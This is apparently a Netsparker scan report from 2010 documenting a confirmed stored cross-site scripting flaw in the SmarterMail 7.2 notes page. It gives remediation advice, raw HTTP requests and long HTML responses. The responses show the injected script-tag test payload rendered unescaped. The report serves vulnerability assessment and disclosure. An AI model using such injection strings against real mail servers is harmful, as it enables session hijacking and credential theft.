Default Installation, SmarterMail Version 7.2 Stored XSS Report

Netsparker, Web Application Security Scanner

NETSPARKER SCAN REPORT SUMMARY

TARGET URL: http://vulnerable.smartermail.7.x.host:9998/
SCAN DATE: 10/2/2010 8:33:22 PM
REPORT DATE: 10/3/2010 11:53:31 AM
SCAN DURATION: 06:27:47.5625000
TOTAL REQUESTS: 225525
AVERAGE SPEED: 9.69 req/sec.

FINDINGS: 17 identified, 11 confirmed, 0 critical, 3 informational

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Command Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, Cross-site Scripting
Proxy
Authentication
Scheduled

VULNERABILITIES

SEVERITY BREAKDOWN: IMPORTANT 29 %, MEDIUM 35 %, LOW 18 %, INFORMATION 18 %

Permanent Cross-site Scripting

2 TOTAL, severity IMPORTANT, CONFIRMED: 2

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This opens several different attack opportunities, mostly hijacking the current session of the user, changing the look of the page by altering the HTML on the fly, and stealing the user's credentials. This happens because input entered by the user is interpreted as HTML/JavaScript/VBScript by the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS attack the attacker can simply submit the payload and wait for users to view the affected page. As soon as someone visits the page, the attacker's stored payload is executed.

XSS targets the users of the application rather than the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might target an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

Remedy References

External References

- /Main/frmNotes.aspx

/Main/frmNotes.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..." />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></..

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:18:00 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10699
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..." />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" name="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" name="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
